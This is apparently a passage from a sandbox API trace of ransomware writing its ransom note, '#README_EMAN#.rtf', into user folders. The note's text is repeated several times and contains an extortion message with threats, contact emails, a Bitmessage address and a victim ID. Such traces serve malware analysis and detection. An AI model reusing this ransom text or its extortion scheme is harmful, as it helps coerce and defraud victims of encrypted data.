y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.757] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.757] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.758] CloseHandle (hObject=0x2cc) returned 1 [0283.758] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0283.758] GetLastError () returned 0x2 [0283.758] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 